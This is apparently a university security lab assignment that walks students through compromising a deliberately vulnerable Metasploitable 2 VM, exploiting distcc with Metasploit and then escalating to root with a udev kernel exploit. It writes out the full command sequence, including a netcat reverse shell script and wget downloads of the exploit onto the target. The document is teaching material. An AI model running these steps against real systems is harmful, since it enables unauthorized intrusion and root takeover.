Proj 18x: Privilege Escalation in Metasploitable (15 pts. extra credit)

What You Need for this Project

A Metasploitable 2 VM to be the target
A Kali machine to act as the attacker

Purpose

To practice using sparta to find vulnerable services, Metasploit to exploit them, searchsploit to find privilege escalation exploits, and using them.

Setup

Start the Target

Start Metsploitable 2. Execute the ifconfig command to get its IP address.

Start the Kali Attacker

Start your Kali VM and log in. Ping the Metasploitable 2 target. If you don't get replies, fix your networking before proceeding.

Task 1: Get a Shell with Low Privileges

Scanning with Sparta

Sparta is a wonderful scanner, fast and effective.

On Kali, in a Terminal, execute this command.

sparta

In the Sparta window, click "Click here to add host(s) to scope". In the "Add hosts(s) to scope" box, enter your Metasploitable 2 IP address, as shown below.

Click the "Add to scope" button.

Within a few seconds, Sparta finds the more obvious services, but it keeps scanning.

A box will pop up attempting to show a screenshot. Close it.

After about 2 minutes, it will find "distcc", as shown below.

DistCC is a used to scale large compiler jobs across systems, but it can be abused to execute arbitrary commands.

Close Sparta.

Using Metasploit to Exploit DistCC

On Kali, in a Terminal, execute this command.

msfconsole

In Metasploit, execute this command.

search distcc

In Metasploit, execute this command.

info exploit/unix/misc/distcc_exec

As shown below, this exploit only requires RHOST.

In Metasploit, execute these commands, using the IP of your Metasploitable 2 target.

use exploit/unix/misc/distcc_exec set RHOST 172.16.1.190 exploit whoami

You get a shell, running as "daemon", as shown below.

Saving the Screen Image: A

Make sure you can see whoami and daemon, as shown above.

Save a FULL DESKTOP image with the filename Proj 18xa from Your Name.

Task 2: Escalating Privileges with a Udev Exploit

Finding the Kernel Version

To escalate privileges, you need a kernel exploit. So the first task is to find out what kernel version the target uses.

In Metasploit, in the command shell, execute these commands.

uname -a lsb_release -a

The target has kernel 2.6.24 and is running Ubuntu 8.04, as shown below.

Finding Exploits

On Kali, open a new Terminal and execute this command, to find exploits that escalate privileges on this kernel.

searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6

We'll use the 8572.c exploit, highlighted in the image below.

On Kali, execute this command, to examine the exploit source code.

less /usr/share/exploitdb/platforms/linux/local/8572.c

Information about the exploit appears, as shown below.

Read it and then press Q to exit "less".

Serving the Exploit with Apache

On Kali, execute these command to restart apache2, and make a symbolic link that will make all the exploits available for download.

service apache2 restart ln -s /usr/share/exploitdb/platforms/linux/local/ /var/www/html/

Preparing a run File

The exploit will execute the /tmp/run file on the target, so we need to make it.

We'll use a simple netcat reverse shell.

On Kali, execute this command.

nano /var/www/html/run

In nano, enter these lines, replacing the IP address with the address of your Kali machine.

#!/bin/bash nc 172.16.1.188 12345 -e /bin/bash

Press Ctrl+C, Y, Enter to save the file.

Uploading the Files

On Kali, in your low-privilege shell, execute these commands to upload the files to the target. Replace the IP address with the IP address of your Kali machine.

cd /tmp wget http://172.16.1.188/run wget http://172.16.1.188/local/8572.c

Compiling the Exploit

On Kali, in your low-privilege shell, execute these commands to compile the exploit file and list files.

gcc -o exploit 8572.c ls -l

Finding the PID

The exploit documentation said that we needed the process identifier (PID) of the udevd netlink socket.

On Kali, in your low-privilege shell, execute these commands to list network processes, and the udev process.

cat /proc/net/netlink ps aux | grep udev

The only nonzero PID in netlink should be the number you want. When I did it, it was 2738, as shown below.

For confirmation, the PID of the udevd process should be one higher. It was 2739 when I did it, as shown below.

Starting a Listener

When the udev exploit runs, it will execute the "run" script, which will connect back to Kali on port 12345.

On Kali, open a new Terminal window and execute these command to listen for connections.

nc -lvp 12345

Running the Exploit

On Kali, in your low-privilege shell, execute this command to escalate privileges and open a reverse shell. Replace the number with the correct PID for your target.

./exploit 2738

The only nonzero PID in netlink should be the number you want. When I did it, it was 2738, as shown below.

For confirmation, the PID of the udevd process should be one higher. It was 2739 when I did it, as shown below.

Saving the Screen Image: B

Make sure you can see whoami and root, as shown above.

Save a FULL DESKTOP image with the filename Proj 18xb from Your Name.

Turning in Your Project

Send the images as email attachments to cnit.124@gmail.com with a Subject line of Proj 18x from Your Name.

References

Posted 10-26-17 by Sam Bowne